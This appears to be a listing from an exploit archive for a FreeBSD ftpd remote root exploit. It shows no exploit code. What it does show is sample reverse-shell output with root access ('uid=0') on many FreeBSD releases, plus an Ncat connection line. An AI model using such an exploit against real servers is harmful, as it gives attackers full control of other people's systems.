Full title: FreeBSD ftpd Remote Root Exploit 
Category: remote exploits
Platform: freebsd
needs user account inside a chroot.


&#039;&#039;&#039;
example reverse shells:

[root@r00tbox /]# uname -a;id;
uname -a;id;
FreeBSD r00tbox 10.0-RELEASE FreeBSD 10.0-RELEASE #0 r260789: Thu Jan 16 22:34:59 UTC 2014     root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel)
[root@r00tbox /]#

# uname -a;id;
FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 03:51:29 UTC 2016     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)

# uname -a;id;
FreeBSD r00tbox 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

# uname -a;id;
FreeBSD r00tbox 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Thu Jul 10 23:44:39 UTC 2014     root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

#uname -a;id;
FreeBSD r00tbox 9.2-RELEASE FreeBSD 9.2-RELEASE #0 r255898: Thu Sep 26 22:50:31 UTC 2013     root@bake.isc.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel)

Ncat: Connection from 192.168.178.46:50444.
sh: can&#039;t access tty; job control turned off
# uname -a;id;
FreeBSD r00tbox 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel)
#

sh: can&#039;t access tty; job control turned off
# uname -a;id;
FreeBSD xxx.hostname 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 05:25:24 UTC 2010     root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)

sh: can&#039;t access tty; job control turned off
# uname -a;
FreeBSD r00tbox.fritz.box 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Thu Jan  1 08:58:24 UTC 2009     root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

sh: can&#039;t access tty; job control turned off
# uname -a;id;
FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 08:21:48 UTC 2008     root@palmer.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)
#

# uname -a;
FreeBSD r00tbox.fritz.box 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 11:43:51 UTC 2008     root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
# id
uid=0(root) gid=0(wheel) groups=0(wheel),1001(test2)

# uname -a;id;
FreeBSD r00tbox.fritz.box 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:18:52 UTC 2008     root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel),1003(test2)


# 0day.today @ http://0day.today/